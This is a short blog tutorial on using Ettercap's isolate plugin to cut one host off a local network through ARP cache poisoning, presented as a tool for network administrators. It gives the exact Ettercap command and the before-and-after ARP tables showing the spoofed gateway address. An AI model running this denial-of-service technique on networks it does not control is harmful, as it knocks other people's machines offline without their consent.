Exploits Database by Offensive Security

Inj3ct0r.com

Thursday, November 18, 2010

Isolate IP With Ettercap

Ettercap has a plug in to isolate network IP address. In a sense it causes a DOS attack. This can be useful for network administrators. For example unlike cisco where you can shutdown an interface on a switch, sonicwall wont let you do such a thing; which can make administering a good amount harder. Especially when you have end users running itunes and torrents etc. 
To start this attack you will need the IP of the host you are isolating. In this case it will be 192.168.2.3. How this attack works every packet the computer sends out will resolver its own mac address. Here is the network setup of a windows box using ipconifg /all.

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : NVIDIA nForce Networking Controller
Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Primary WINS Server . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : Thursday, July 24, 2008 11:42:50 AM
Lease Expires . . . . . . . . . . : Thursday, July 24, 2008 11:52:50 AM

Here is the arp -a out put
Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-06-b1-36-1f-24 dynamic

To start the attack we are going to be using the isolate plugin. And specify the IP that we are attacking. Here is what the command looks like.

#ettercap -i sk0 -P isolate /192.168.2.3/ //

The command will take about 5 min to go into effect since that is how long it takes the arp cache to refresh, once it does this is what the ap should look like.

Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-11-D8-70-48-4F dynamic

As you notice that is'nt the same mac address that 192.168.2.1 had when we first ran the arp -a, it is now resolving the mac address of itself. If you try to resolve a web site the ettercap will output something along the lines of this.

TCP 192.168.2.3:80 --> 127.0.0.1:80 | AP

No comments:

Post a Comment